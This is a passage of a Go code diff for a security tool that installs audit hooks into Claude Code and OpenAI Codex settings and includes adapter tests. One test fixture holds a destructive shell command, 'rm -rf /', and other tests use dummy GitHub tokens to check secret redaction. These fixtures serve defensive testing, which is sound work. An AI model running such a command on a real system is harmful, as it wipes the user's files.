+// isManagedCommand reports whether cmd is a DMG-installed hook entry.
+// It explicitly does NOT match legacy hook entries left by other tools.
+func isManagedCommand(cmd string) bool {
+	return managedCmdRE.MatchString(cmd)
+}
+
+// upsertHook adds or refreshes the DMG matcher entry for one hook
+// type while preserving every unrelated user matcher and inner hook.
+// When the desired entry is already in place, the JSON document bytes
+// are not touched at all so a re-install on a pretty-printed file does
+// not collapse formatting.
+//
+// command is the literal string to write into the entry's `command`
+// field — the adapter computes it via a.commandFor(hookType) so the
+// settings document never embeds the binary path resolution logic.
+func (s *settingsDoc) upsertHook(hookType event.HookEvent, command string) (added bool) {
+	want := installEntry(command)
+	wantRaw, err := configedit.MarshalRawJSON(want)
+	if err != nil {
+		return false
+	}
+	path := hookEventPath(hookType)
+	list := gjson.GetBytes(s.json, path).Array()
+
+	// outGroups accumulates the raw JSON of every surviving matcher
+	// group; placed tracks whether the DMG entry exists anywhere;
+	// listChanged gates the final document patch.
+	outGroups := make([]string, 0, len(list)+1)
+	placed := false
+	listChanged := false
+
+	for _, group := range list {
+		// Non-object group members are passed through untouched.
+		if !group.IsObject() {
+			outGroups = append(outGroups, group.Raw)
+			continue
+		}
+		matcher := group.Get("matcher").String()
+		inner := group.Get("hooks").Array()
+
+		filteredInner := make([]string, 0, len(inner)+1)
+		innerChanged := false
+		for _, h := range inner {
+			if !h.IsObject() {
+				filteredInner = append(filteredInner, h.Raw)
+				continue
+			}
+			cmd := h.Get("command").String()
+			if isManagedCommand(cmd) {
+				// NOTE(review): a managed entry found under a
+				// non-"*" matcher is refreshed in place, not moved
+				// to the "*" group — confirm that is the intended
+				// self-heal behavior for stale matchers.
+				refreshed, err := refreshManagedEntry(h.Raw, want)
+				if err != nil {
+					return false
+				}
+				if refreshed != h.Raw {
+					innerChanged = true
+				}
+				filteredInner = append(filteredInner, refreshed)
+				placed = true
+				continue
+			}
+			filteredInner = append(filteredInner, h.Raw)
+		}
+		// First "*" group seen without the entry already placed gets
+		// the new DMG entry appended after the user's own hooks.
+		if matcher == matcherAll && !placed {
+			filteredInner = append(filteredInner, wantRaw)
+			placed = true
+			innerChanged = true
+		}
+		// A group whose hooks list ends up empty is dropped entirely.
+		if len(filteredInner) == 0 {
+			listChanged = true
+			continue
+		}
+		if !innerChanged {
+			outGroups = append(outGroups, group.Raw)
+			continue
+		}
+		updated, err := sjson.SetRawBytes([]byte(group.Raw), "hooks", []byte(configedit.RawArray(filteredInner)))
+		if err != nil {
+			return false
+		}
+		outGroups = append(outGroups, string(updated))
+		listChanged = true
+	}
+
+	// No existing "*" group and no managed entry anywhere: append a
+	// fresh {"matcher":"*","hooks":[want]} group.
+	if !placed {
+		newGroup := struct {
+			Matcher string      `json:"matcher"`
+			Hooks   []hookEntry `json:"hooks"`
+		}{Matcher: matcherAll, Hooks: []hookEntry{want}}
+		raw, err := configedit.MarshalRawJSON(newGroup)
+		if err != nil {
+			return false
+		}
+		outGroups = append(outGroups, raw)
+		added = true
+		listChanged = true
+	}
+
+	if !listChanged {
+		return added
+	}
+
+	patched, err := configedit.SetRaw(s.json, path, configedit.RawArray(outGroups))
+	if err != nil {
+		return false
+	}
+	s.json = patched
+	return added
+}
+
+// refreshManagedEntry rewrites type, command, and timeout on an existing
+// DMG hook entry while preserving every other key the user might have
+// added. Used so that a `hooks install` re-run after the binary path
+// changes (e.g. `brew upgrade` relocated it) updates the absolute path
+// in-place rather than leaving a stale entry behind.
+func refreshManagedEntry(rawEntry string, want hookEntry) (string, error) {
+	out := []byte(rawEntry)
+	var err error
+	out, err = sjson.SetBytes(out, "type", want.Type)
+	if err != nil {
+		return "", err
+	}
+	out, err = sjson.SetBytes(out, "command", want.Command)
+	if err != nil {
+		return "", err
+	}
+	out, err = sjson.SetBytes(out, "timeout", want.Timeout)
+	if err != nil {
+		return "", err
+	}
+	return string(out), nil
+}
+
+// removeManagedHooks strips every DMG-owned entry (regex match on
+// managedCmdRE). Returns the hook events from which at least one entry
+// was removed. binaryPath is reserved for future scoping (e.g.,
+// "remove only entries pointing at this specific binary"); today we
+// remove any entry whose command matches managedCmdRE, regardless of
+// the path token.
+func (s *settingsDoc) removeManagedHooks(binaryPath string) []event.HookEvent {
+	// binaryPath intentionally unused today — see doc comment.
+	_ = binaryPath
+	var removed []event.HookEvent
+	hooksRoot := gjson.GetBytes(s.json, "hooks")
+	if !hooksRoot.IsObject() {
+		return nil
+	}
+
+	// Snapshot the hook-event keys and their group lists before any
+	// mutation, since s.json is rewritten inside the loop below.
+	type hookKeyEntry struct {
+		key  string
+		list []gjson.Result
+	}
+	var events []hookKeyEntry
+	hooksRoot.ForEach(func(k, v gjson.Result) bool {
+		if v.IsArray() {
+			events = append(events, hookKeyEntry{key: k.String(), list: v.Array()})
+		}
+		return true
+	})
+
+	// NOTE(review): sjson/configedit failures below return nil
+	// mid-walk; s.json may already contain edits from earlier
+	// iterations at that point — confirm callers treat a nil return
+	// as "nothing removed" safely.
+	for _, ev := range events {
+		outGroups := make([]string, 0, len(ev.list))
+		didRemove := false
+		for _, group := range ev.list {
+			if !group.IsObject() {
+				outGroups = append(outGroups, group.Raw)
+				continue
+			}
+			inner := group.Get("hooks").Array()
+			filteredInner := make([]string, 0, len(inner))
+			groupChanged := false
+			for _, h := range inner {
+				if h.IsObject() && isManagedCommand(h.Get("command").String()) {
+					didRemove = true
+					groupChanged = true
+					continue
+				}
+				filteredInner = append(filteredInner, h.Raw)
+			}
+			// A group left with no hooks is dropped from the output.
+			if len(filteredInner) == 0 {
+				continue
+			}
+			if !groupChanged {
+				outGroups = append(outGroups, group.Raw)
+				continue
+			}
+			updated, err := sjson.SetRawBytes([]byte(group.Raw), "hooks", []byte(configedit.RawArray(filteredInner)))
+			if err != nil {
+				return nil
+			}
+			outGroups = append(outGroups, string(updated))
+		}
+		if didRemove {
+			removed = append(removed, event.HookEvent(ev.key))
+		}
+		if !didRemove {
+			continue
+		}
+		path := configedit.Path("hooks", ev.key)
+		// All groups gone: delete the event key outright.
+		if len(outGroups) == 0 {
+			next, err := configedit.Delete(s.json, path)
+			if err != nil {
+				return nil
+			}
+			s.json = next
+			continue
+		}
+		next, err := configedit.SetRaw(s.json, path, configedit.RawArray(outGroups))
+		if err != nil {
+			return nil
+		}
+		s.json = next
+	}
+
+	// Drop a now-empty "hooks" object so an uninstalled file does not
+	// carry a dangling `"hooks": {}` key.
+	if hooks := gjson.GetBytes(s.json, "hooks"); hooks.IsObject() {
+		empty := true
+		hooks.ForEach(func(k, v gjson.Result) bool {
+			empty = false
+			return false
+		})
+		if empty {
+			next, err := configedit.Delete(s.json, "hooks")
+			if err == nil {
+				s.json = next
+			}
+		}
+	}
+
+	// Deterministic ordering for callers/tests.
+	slices.SortFunc(removed, func(a, b event.HookEvent) int {
+		switch {
+		case a < b:
+			return -1
+		case a > b:
+			return 1
+		}
+		return 0
+	})
+	return removed
+}
+
+// writeAtomic installs doc.json through atomicfile. When the upsert
+// pipeline produced no structural change, doc.json is byte-identical
+// to doc.orig and the call is a complete no-op (no backup, no write,
+// returns nil result). Otherwise the entire file is pretty-printed
+// with 2-space indent so the result is human-readable.
+//
+// Returns nil, nil on no-op. Returns &WriteResult, nil on a successful
+// write. The caller copies fields into adapter.InstallResult /
+// adapter.UninstallResult so the install handler can chown them under
+// root.
+func writeAtomic(path string, doc *settingsDoc) (*atomicfile.WriteResult, error) {
+	if !json.Valid(doc.json) {
+		return nil, fmt.Errorf("claude settings: invalid JSON after edit")
+	}
+	if bytes.Equal(doc.json, doc.orig) {
+		return nil, nil
+	}
+	out := pretty.PrettyOptions(doc.json, &pretty.Options{Indent: "  ", Width: 80})
+	if bytes.Equal(out, doc.orig) {
+		return nil, nil
+	}
+	mode := atomicfile.PickMode(path, settingsMode)
+	wr, err := atomicfile.WriteAtomic(path, out, mode)
+	if err != nil {
+		return nil, err
+	}
+	return &wr, nil
+}
diff --git a/internal/aiagents/adapter/codex/adapter.go b/internal/aiagents/adapter/codex/adapter.go
new file mode 100644
index 0000000..ec3b7ce
--- /dev/null
+++ b/internal/aiagents/adapter/codex/adapter.go
@@ -0,0 +1,250 @@
+// Package codex implements the Adapter interface for OpenAI Codex.
+//
+// Detection is by `executor.LookPath("codex")`. Codex stores hook
+// configuration across two files:
+//
+//   - ~/.codex/hooks.json — hook definitions (JSON)
+//   - ~/.codex/config.toml — global config; install also sets
+//     `[features].codex_hooks = true` here so Codex actually invokes
+//     hooks at runtime
+//
+// Uninstall removes DMG-owned hook entries from hooks.json but does
+// NOT revert the codex_hooks feature flag — the user may have wired
+// up other tools' hooks that depend on it.
+//
+// Restore + Status are intentionally absent (see adapter.Adapter for
+// the trimmed-interface rationale). There is no Force install option:
+// the upsert path always refreshes managed entries in place, which
+// covers the binary-move self-heal case the same way claudecode does.
+package codex
+
+import (
+	"context"
+	"fmt"
+	"path/filepath"
+	"slices"
+
+	"github.com/step-security/dev-machine-guard/internal/aiagents/adapter"
+	"github.com/step-security/dev-machine-guard/internal/aiagents/configedit"
+	"github.com/step-security/dev-machine-guard/internal/aiagents/event"
+	"github.com/step-security/dev-machine-guard/internal/executor"
+)
+
+// AgentName is the identifier DMG uses for Codex on the wire and in
+// the `_hook <agent>` invocation. Adapter-private; the runtime never
+// compares against it.
+const AgentName = "codex"
+
+// AgentBinary is the name `executor.LookPath` searches for during
+// detection. Adapter-private.
+const AgentBinary = "codex"
+
+// Adapter implements adapter.Adapter for OpenAI Codex.
+//
+// State is set once at construction and never mutated. hooksPath and
+// configPath are derived from home; binaryPath is the absolute DMG
+// binary path the install handler resolved via
+// internal/aiagents/cli.Resolve.
+type Adapter struct {
+	hooksPath  string
+	configPath string
+	binaryPath string
+}
+
+// New constructs an Adapter for the given user home and resolved DMG
+// binary path. Both arguments must be absolute; behavior with relative
+// paths is undefined.
+func New(home, binaryPath string) *Adapter {
+	return &Adapter{
+		hooksPath:  filepath.Join(home, ".codex", "hooks.json"),
+		configPath: filepath.Join(home, ".codex", "config.toml"),
+		binaryPath: binaryPath,
+	}
+}
+
+// Name returns the adapter agent name.
+func (a *Adapter) Name() string { return AgentName }
+
+// ManagedFiles enumerates the two files Codex install/uninstall
+// mutates. Used by the install handler for the chown sweep under root.
+func (a *Adapter) ManagedFiles() []adapter.ManagedFile {
+	return []adapter.ManagedFile{
+		{Label: "~/.codex/hooks.json", Path: a.hooksPath},
+		{Label: "~/.codex/config.toml", Path: a.configPath},
+	}
+}
+
+// Detect reports whether the Codex CLI is on $PATH. Settings file
+// presence is NOT a gate — install creates the files from scratch
+// when absent.
+func (a *Adapter) Detect(ctx context.Context, exec executor.Executor) (adapter.DetectionResult, error) {
+	res := adapter.DetectionResult{}
+	bin, err := exec.LookPath(AgentBinary)
+	if err != nil {
+		// Not-found is a clean "not detected", never an error.
+		res.Notes = append(res.Notes, "codex CLI not found on $PATH")
+		return res, nil
+	}
+	res.Detected = true
+	res.BinaryPath = bin
+	return res, nil
+}
+
+// Install adds DMG-owned hooks to hooks.json and ensures the
+// `[features].codex_hooks=true` flag in config.toml.
+//
+// Multi-file safety: every output buffer (hooks.json + config.toml)
+// is loaded, validated, and encoded BEFORE the first write happens —
+// a malformed config.toml aborts the operation with hooks.json still
+// intact. Partial-write states are forbidden (covered by
+// TestInstallMalformedTOMLDoesNotMutateHooks).
+//
+// NOTE(review): hooks.json is written before config.toml below, so an
+// I/O failure on the config write can still leave hooks.json updated —
+// the guarantee above covers parse/encode errors only; confirm that is
+// the accepted trade-off.
+//
+// Idempotent: when both files are already in desired state, returns
+// empty WrittenFiles and BackupFiles and performs no writes.
+func (a *Adapter) Install(ctx context.Context) (adapter.InstallResult, error) {
+	res := adapter.InstallResult{}
+
+	// Load+validate-encode both files BEFORE writing either.
+	doc, err := loadHooksDoc(a.hooksPath)
+	if err != nil {
+		return res, err
+	}
+	cfgBytes, err := loadConfigTOMLBytes(a.configPath)
+	if err != nil {
+		return res, err
+	}
+
+	for _, ht := range supportedHookEvents {
+		if doc.upsertHook(ht, a.commandFor(ht)) {
+			res.HooksAdded = append(res.HooksAdded, ht)
+		} else {
+			res.HooksKept = append(res.HooksKept, ht)
+		}
+	}
+	patchedCfg, flagChanged, err := configedit.EnsureCodexHooksFlag(cfgBytes)
+	if err != nil {
+		return res, err
+	}
+
+	hooksWR, err := writeHooksAtomic(a.hooksPath, doc)
+	if err != nil {
+		return res, err
+	}
+	if hooksWR != nil {
+		res.WrittenFiles = append(res.WrittenFiles, hooksWR.Path)
+		if hooksWR.BackupPath != "" {
+			res.BackupFiles = append(res.BackupFiles, hooksWR.BackupPath)
+		}
+		res.CreatedDirs = append(res.CreatedDirs, hooksWR.CreatedDirs...)
+	}
+
+	// config.toml is only rewritten when the feature flag actually
+	// changed; otherwise the file is left completely untouched.
+	if flagChanged {
+		cfgWR, err := writeConfigAtomic(a.configPath, patchedCfg)
+		if err != nil {
+			return res, err
+		}
+		if cfgWR != nil {
+			res.WrittenFiles = append(res.WrittenFiles, cfgWR.Path)
+			if cfgWR.BackupPath != "" {
+				res.BackupFiles = append(res.BackupFiles, cfgWR.BackupPath)
+			}
+			res.CreatedDirs = appendUnique(res.CreatedDirs, cfgWR.CreatedDirs...)
+		}
+		res.Notes = append(res.Notes, "enabled [features].codex_hooks=true in "+a.configPath)
+	}
+	return res, nil
+}
+
+// Uninstall removes DMG-owned hook entries from hooks.json. The
+// `[features].codex_hooks` flag in config.toml is intentionally NOT
+// reverted — the user may have other tools' hooks that depend on it
+// being enabled.
+//
+// The settings file is preserved even when uninstall removes the last
+// hook — leaving an empty {} (or whatever non-hook keys remain) keeps
+// any user customization intact.
+func (a *Adapter) Uninstall(ctx context.Context) (adapter.UninstallResult, error) {
+	res := adapter.UninstallResult{}
+
+	doc, err := loadHooksDoc(a.hooksPath)
+	if err != nil {
+		return res, err
+	}
+	res.HooksRemoved = doc.removeManagedHooks(a.binaryPath)
+	// Nothing removed: report and skip the write entirely.
+	if len(res.HooksRemoved) == 0 {
+		res.Notes = append(res.Notes, "no DMG-owned Codex hook entries found")
+		res.Notes = append(res.Notes, "Codex hooks feature flag left enabled because non-DMG hooks may exist")
+		return res, nil
+	}
+	wr, err := writeHooksAtomic(a.hooksPath, doc)
+	if err != nil {
+		return res, fmt.Errorf("codex uninstall: %w", err)
+	}
+	if wr != nil {
+		res.WrittenFiles = append(res.WrittenFiles, wr.Path)
+		if wr.BackupPath != "" {
+			res.BackupFiles = append(res.BackupFiles, wr.BackupPath)
+		}
+	}
+	res.Notes = append(res.Notes, "Codex hooks feature flag left enabled because non-DMG hooks may exist")
+	return res, nil
+}
+
+// commandFor renders the literal command string DMG writes into the
+// settings entry for hookEvent. Format:
+//
+//	<binary-path> _hook codex <hook-event>
+//
+// The binary path is absolute and symlink-resolved at install time;
+// see internal/aiagents/cli/selfpath.go.
+func (a *Adapter) commandFor(hookEvent event.HookEvent) string {
+	return a.binaryPath + " _hook " + AgentName + " " + string(hookEvent)
+}
+
+// noopResponse marshals to {} — Codex treats empty output / {} as
+// "continue, no decision". It is the default for every hook event.
+type noopResponse struct{}
+
+// preToolUseDeny is the spec-compliant Codex deny shape. Used only on
+// PreToolUse block decisions.
+type preToolUseDeny struct {
+	HookSpecificOutput map[string]any `json:"hookSpecificOutput"`
+}
+
+// DecideResponse renders a generic Decision into Codex's wire format.
+// Default is the empty object {}; only PreToolUse + Allow=false
+// produces the hook-specific deny shape.
+//
+// The runtime NEVER returns Allow=false to the agent today: the
+// policy evaluator is forced to audit mode. The Allow=false path is
+// exercised only by adapter unit tests until block mode ships.
+func (a *Adapter) DecideResponse(ev *event.Event, d adapter.Decision) adapter.HookResponse {
+	if d.Allow || ev == nil {
+		return noopResponse{}
+	}
+	if ev.HookPhase == event.HookPhasePreTool {
+		// An empty UserMessage falls back to the canonical deny text.
+		msg := d.UserMessage
+		if msg == "" {
+			msg = "Blocked by your organization's administrator."
+		}
+		return preToolUseDeny{
+			HookSpecificOutput: map[string]any{
+				"hookEventName":            string(HookPreToolUse),
+				"permissionDecision":       "deny",
+				"permissionDecisionReason": msg,
+			},
+		}
+	}
+	// A block decision on any non-PreToolUse phase degrades to the
+	// no-op {} rather than emitting an out-of-spec deny.
+	return noopResponse{}
+}
+
+// appendUnique appends each item to base if not already present,
+// preserving base's order. Used to merge CreatedDirs from two
+// atomicfile writes that share a parent (~/.codex/).
+func appendUnique(base []string, items ...string) []string {
+	for _, it := range items {
+		if !slices.Contains(base, it) {
+			base = append(base, it)
+		}
+	}
+	return base
+}
diff --git a/internal/aiagents/adapter/codex/adapter_test.go b/internal/aiagents/adapter/codex/adapter_test.go
new file mode 100644
index 0000000..7972fd2
--- /dev/null
+++ b/internal/aiagents/adapter/codex/adapter_test.go
@@ -0,0 +1,900 @@
+package codex
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"slices"
+	"strings"
+	"testing"
+
+	toml "github.com/pelletier/go-toml/v2"
+
+	"github.com/step-security/dev-machine-guard/internal/aiagents/adapter"
+	"github.com/step-security/dev-machine-guard/internal/aiagents/event"
+	"github.com/step-security/dev-machine-guard/internal/executor"
+)
+
+// testBinary is the absolute DMG binary path tests pass to New(). The
+// uninstall matcher (managedCmdRE) is path-token-agnostic, so the
+// specific value just needs to satisfy
+// `(^|/)stepsecurity-dev-machine-guard\s+_hook\s+`.
+const testBinary = "/usr/local/bin/stepsecurity-dev-machine-guard" + +// commandFor renders the canonical command string the adapter writes +// into hook entries for testBinary. Tests use this to assert exact +// command values without duplicating the format. +func commandFor(hookEvent event.HookEvent) string { + return testBinary + " _hook codex " + string(hookEvent) +} + +// newCodexHome returns (adapter, home, hooksPath, configPath). Files +// are NOT pre-created — callers that need pre-existing files use +// writeFile. +func newCodexHome(t *testing.T) (*Adapter, string, string, string) { + t.Helper() + home := t.TempDir() + a := New(home, testBinary) + codexDir := filepath.Join(home, ".codex") + return a, home, filepath.Join(codexDir, "hooks.json"), filepath.Join(codexDir, "config.toml") +} + +// withCodexFiles pre-creates ~/.codex/{hooks.json,config.toml} with +// the given bodies. Empty bodies skip that file. +func withCodexFiles(t *testing.T, hooksBody, cfgBody string) (*Adapter, string, string, string) { + t.Helper() + a, home, hooks, cfg := newCodexHome(t) + if hooksBody != "" || cfgBody != "" { + if err := os.MkdirAll(filepath.Dir(hooks), 0o700); err != nil { + t.Fatal(err) + } + } + if hooksBody != "" { + writeFile(t, hooks, hooksBody) + } + if cfgBody != "" { + writeFile(t, cfg, cfgBody) + } + return a, home, hooks, cfg +} + +func writeFile(t *testing.T, path, body string) { + t.Helper() + if err := os.WriteFile(path, []byte(body), 0o600); err != nil { + t.Fatal(err) + } +} + +func readJSON(t *testing.T, path string) map[string]any { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + var m map[string]any + if err := json.Unmarshal(b, &m); err != nil { + t.Fatalf("hooks.json not valid JSON: %v: %s", err, b) + } + return m +} + +func readTOML(t *testing.T, path string) map[string]any { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + m := map[string]any{} + if err := toml.Unmarshal(b, &m); 
err != nil { + t.Fatalf("config.toml not valid TOML: %v: %s", err, b) + } + return m +} + +func TestNameAndManagedFiles(t *testing.T) { + a, home, hooks, cfg := newCodexHome(t) + if a.Name() != "codex" { + t.Errorf("Name=%q", a.Name()) + } + mfs := a.ManagedFiles() + if len(mfs) != 2 { + t.Fatalf("ManagedFiles len=%d", len(mfs)) + } + if mfs[0].Path != hooks || mfs[1].Path != cfg { + t.Errorf("ManagedFiles paths: %+v (home=%s)", mfs, home) + } +} + +func TestDetectReportsPathFromExecutor(t *testing.T) { + a := New(t.TempDir(), testBinary) + + mock := executor.NewMock() + res, err := a.Detect(context.Background(), mock) + if err != nil { + t.Fatalf("Detect: %v", err) + } + if res.Detected { + t.Errorf("expected Detected=false when codex not on $PATH") + } + + mock.SetPath("codex", "/usr/local/bin/codex") + res, err = a.Detect(context.Background(), mock) + if err != nil { + t.Fatalf("Detect: %v", err) + } + if !res.Detected { + t.Errorf("expected Detected=true when codex on $PATH") + } + if res.BinaryPath != "/usr/local/bin/codex" { + t.Errorf("BinaryPath = %q, want /usr/local/bin/codex", res.BinaryPath) + } +} + +// ---------- DecideResponse ---------- + +func TestDecideResponseAllowEmptyObject(t *testing.T) { + a := New(t.TempDir(), testBinary) + for _, ht := range supportedHookEvents { + ev := &event.Event{HookEvent: ht, HookPhase: phaseFor(ht)} + resp := a.DecideResponse(ev, adapter.AllowDecision()) + encoded, _ := json.Marshal(resp) + if string(encoded) != `{}` { + t.Errorf("hook %s: allow shape: %s", ht, encoded) + } + } +} + +func TestDecideResponsePreToolUseDenyShape(t *testing.T) { + a := New(t.TempDir(), testBinary) + ev := &event.Event{HookEvent: HookPreToolUse, HookPhase: event.HookPhasePreTool} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false, UserMessage: "Blocked by your organization's administrator."}) + encoded, _ := json.Marshal(resp) + var got map[string]any + if err := json.Unmarshal(encoded, &got); err != nil { + t.Fatal(err) + } + 
hso, ok := got["hookSpecificOutput"].(map[string]any) + if !ok { + t.Fatalf("missing hookSpecificOutput: %s", encoded) + } + if hso["hookEventName"] != "PreToolUse" { + t.Errorf("hookEventName: %v", hso["hookEventName"]) + } + if hso["permissionDecision"] != "deny" { + t.Errorf("permissionDecision: %v", hso["permissionDecision"]) + } + if hso["permissionDecisionReason"] != "Blocked by your organization's administrator." { + t.Errorf("reason: %v", hso["permissionDecisionReason"]) + } + for _, banned := range []string{"continue", "stopReason", "suppressOutput", "updatedInput", "updatedPermissions", "interrupt", "decision", "additionalContext"} { + if _, ok := got[banned]; ok { + t.Errorf("must not emit %q: %s", banned, encoded) + } + } +} + +func TestDecideResponseDefaultBlockMessage(t *testing.T) { + // The user-visible deny string is "Blocked by your organization's + // administrator." When the runtime passes a Decision with empty + // UserMessage, the adapter must substitute this literal verbatim. 
+ a := New(t.TempDir(), testBinary) + ev := &event.Event{HookEvent: HookPreToolUse, HookPhase: event.HookPhasePreTool} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false}) + encoded, _ := json.Marshal(resp) + if !strings.Contains(string(encoded), "Blocked by your organization's administrator.") { + t.Errorf("default deny message missing/changed: %s", encoded) + } +} + +func TestDecideResponseNonPreToolUseBlockReturnsEmpty(t *testing.T) { + a := New(t.TempDir(), testBinary) + for _, ht := range []event.HookEvent{HookPostToolUse, HookSessionStart, HookPermissionRequest, HookUserPromptSubmit, HookStop} { + ev := &event.Event{HookEvent: ht, HookPhase: phaseFor(ht)} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false, UserMessage: "x"}) + encoded, _ := json.Marshal(resp) + if string(encoded) != `{}` { + t.Errorf("hook %s: stray block must produce {}, got %s", ht, encoded) + } + } +} + +func TestDecideResponseNilEventEmpty(t *testing.T) { + a := New(t.TempDir(), testBinary) + resp := a.DecideResponse(nil, adapter.Decision{Allow: false, UserMessage: "ignored"}) + encoded, _ := json.Marshal(resp) + if string(encoded) != `{}` { + t.Errorf("nil event: %s", encoded) + } +} + +// ---------- ParseEvent ---------- + +func parse(t *testing.T, hook event.HookEvent, body string) *event.Event { + t.Helper() + a := New(t.TempDir(), testBinary) + ev, err := a.ParseEvent(context.Background(), hook, []byte(body)) + if err != nil { + t.Fatalf("ParseEvent: %v", err) + } + return ev +} + +func TestParseSessionStartKeepsSource(t *testing.T) { + ev := parse(t, HookSessionStart, `{"session_id":"s","source":"startup","cwd":"/tmp"}`) + if ev.HookPhase != event.HookPhaseSessionStart { + t.Errorf("phase: %s", ev.HookPhase) + } + if ev.ActionType != "" { + t.Errorf("action_type must be empty, got %q", ev.ActionType) + } + if ev.Payload["source"] != "startup" { + t.Errorf("source not preserved: %v", ev.Payload) + } +} + +func TestParseRecordsHookEventNameMismatch(t *testing.T) { 
+ ev := parse(t, HookSessionStart, `{"hook_event_name":"PreToolUse"}`) + if ev.HookEvent != HookSessionStart { + t.Errorf("HookEvent should follow CLI arg, got %q", ev.HookEvent) + } + if len(ev.Errors) != 1 || ev.Errors[0].Code != "hook_event_name_mismatch" { + t.Errorf("expected mismatch error, got %+v", ev.Errors) + } +} + +func TestParsePreToolUseBashClassifies(t *testing.T) { + ev := parse(t, HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"echo hi","cwd":"/tmp"} + }`) + if ev.HookPhase != event.HookPhasePreTool { + t.Errorf("phase: %s", ev.HookPhase) + } + if ev.ActionType != event.ActionCommandExec { + t.Errorf("action: %s", ev.ActionType) + } + a := New(t.TempDir(), testBinary) + cmd, cwd, ok := a.ShellCommand(ev) + if !ok || cmd == "" || cwd == "" { + t.Errorf("shell extraction failed: cmd=%q cwd=%q ok=%v", cmd, cwd, ok) + } +} + +func TestParsePreToolUseBashRedactsSecrets(t *testing.T) { + ev := parse(t, HookPreToolUse, `{"tool_name":"Bash","tool_input":{"command":"GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa make deploy"}}`) + encoded, _ := json.Marshal(ev) + if strings.Contains(string(encoded), "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("secret leaked: %s", encoded) + } +} + +func TestParsePreToolUseApplyPatchIsFileWriteNotShell(t *testing.T) { + ev := parse(t, HookPreToolUse, `{"tool_name":"apply_patch","tool_input":{"command":"*** Begin Patch ***"}}`) + if ev.ActionType != event.ActionFileWrite { + t.Errorf("action: %s", ev.ActionType) + } + a := New(t.TempDir(), testBinary) + if _, _, ok := a.ShellCommand(ev); ok { + t.Errorf("apply_patch must not be treated as shell") + } +} + +func TestParsePreToolUseMCPClassifies(t *testing.T) { + ev := parse(t, HookPreToolUse, `{"tool_name":"mcp__filesystem__read_file","tool_input":{"path":"/tmp"}}`) + if ev.ActionType != event.ActionMCPInvocation { + t.Errorf("action: %s", ev.ActionType) + } +} + +func 
TestParsePermissionRequestNoActionType(t *testing.T) { + ev := parse(t, HookPermissionRequest, `{"tool_name":"Bash","tool_input":{"command":"rm -rf /","description":"delete world"}}`) + if ev.HookPhase != event.HookPhasePermissionRequest { + t.Errorf("phase: %s", ev.HookPhase) + } + if ev.ActionType != "" { + t.Errorf("action_type must be empty, got %q", ev.ActionType) + } + ti := ev.Payload["tool_input"].(map[string]any) + if ti["description"] != "delete world" { + t.Errorf("description not preserved: %v", ti) + } +} + +func TestParsePostToolUseSuccess(t *testing.T) { + ev := parse(t, HookPostToolUse, `{"tool_name":"Bash","tool_input":{"command":"echo hi"},"tool_response":"hi"}`) + if ev.ResultStatus != event.ResultSuccess { + t.Errorf("result_status: %s", ev.ResultStatus) + } + if ev.Payload["tool_response"] != "hi" { + t.Errorf("tool_response not preserved: %v", ev.Payload) + } +} + +func TestParseUserPromptKeepsRedactedPrompt(t *testing.T) { + ev := parse(t, HookUserPromptSubmit, `{"prompt":"deploy with GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}`) + encoded, _ := json.Marshal(ev) + got := string(encoded) + if strings.Contains(got, "prompt_present") { + t.Errorf("prompt must be preserved, not stub: %s", got) + } + if strings.Contains(got, "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("secret in prompt leaked: %s", got) + } + if !strings.Contains(ev.Payload["prompt"].(string), "deploy") { + t.Errorf("prompt text lost: %v", ev.Payload["prompt"]) + } +} + +func TestParseStopScrubsLastAssistantMessage(t *testing.T) { + ev := parse(t, HookStop, `{"last_assistant_message":"hello world"}`) + encoded, _ := json.Marshal(ev) + got := string(encoded) + if strings.Contains(got, "hello world") { + t.Errorf("last_assistant_message leaked: %s", got) + } + if !strings.Contains(got, `"last_assistant_message_present":true`) { + t.Errorf("expected presence marker: %s", got) + } +} + +func TestParseInvalidJSONReturnsError(t *testing.T) { + a := 
New(t.TempDir(), testBinary) + _, err := a.ParseEvent(context.Background(), HookPreToolUse, []byte(`{not json`)) + if err == nil { + t.Error("expected error on invalid JSON") + } +} + +func TestParseAgentNameIsCodex(t *testing.T) { + ev := parse(t, HookSessionStart, `{}`) + if ev.AgentName != "codex" { + t.Errorf("AgentName: %s", ev.AgentName) + } +} + +func TestParsePopulatesCommonFields(t *testing.T) { + ev := parse(t, HookPreToolUse, `{ + "session_id":"sess", + "cwd":"/tmp", + "permission_mode":"default", + "tool_name":"Bash", + "tool_use_id":"tu_1", + "tool_input":{"command":"echo"} + }`) + if ev.SessionID != "sess" || ev.WorkingDirectory != "/tmp" || ev.PermissionMode != "default" || ev.ToolName != "Bash" || ev.ToolUseID != "tu_1" { + t.Errorf("fields: %+v", ev) + } +} + +func TestPhaseForUnknown(t *testing.T) { + if phaseFor("Bogus") != event.HookPhaseUnknown { + t.Errorf("phaseFor unknown: %s", phaseFor("Bogus")) + } +} + +// ---------- Install ---------- + +func TestInstallCreatesHooksAndFeatureFlag(t *testing.T) { + a, _, hooks, cfg := newCodexHome(t) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("Install: %v", err) + } + if len(res.HooksAdded) != len(supportedHookEvents) { + t.Errorf("expected all hooks added, got %v", res.HooksAdded) + } + got := readJSON(t, hooks) + hooksMap, ok := got["hooks"].(map[string]any) + if !ok { + t.Fatalf("hooks key missing: %v", got) + } + for _, ht := range supportedHookEvents { + if _, ok := hooksMap[string(ht)]; !ok { + t.Errorf("hook %s missing from output: %v", ht, hooksMap) + } + } + pre := hooksMap["PreToolUse"].([]any)[0].(map[string]any) + if pre["matcher"] != "*" { + t.Errorf("PreToolUse matcher: %v", pre["matcher"]) + } + innerPre := pre["hooks"].([]any)[0].(map[string]any) + if 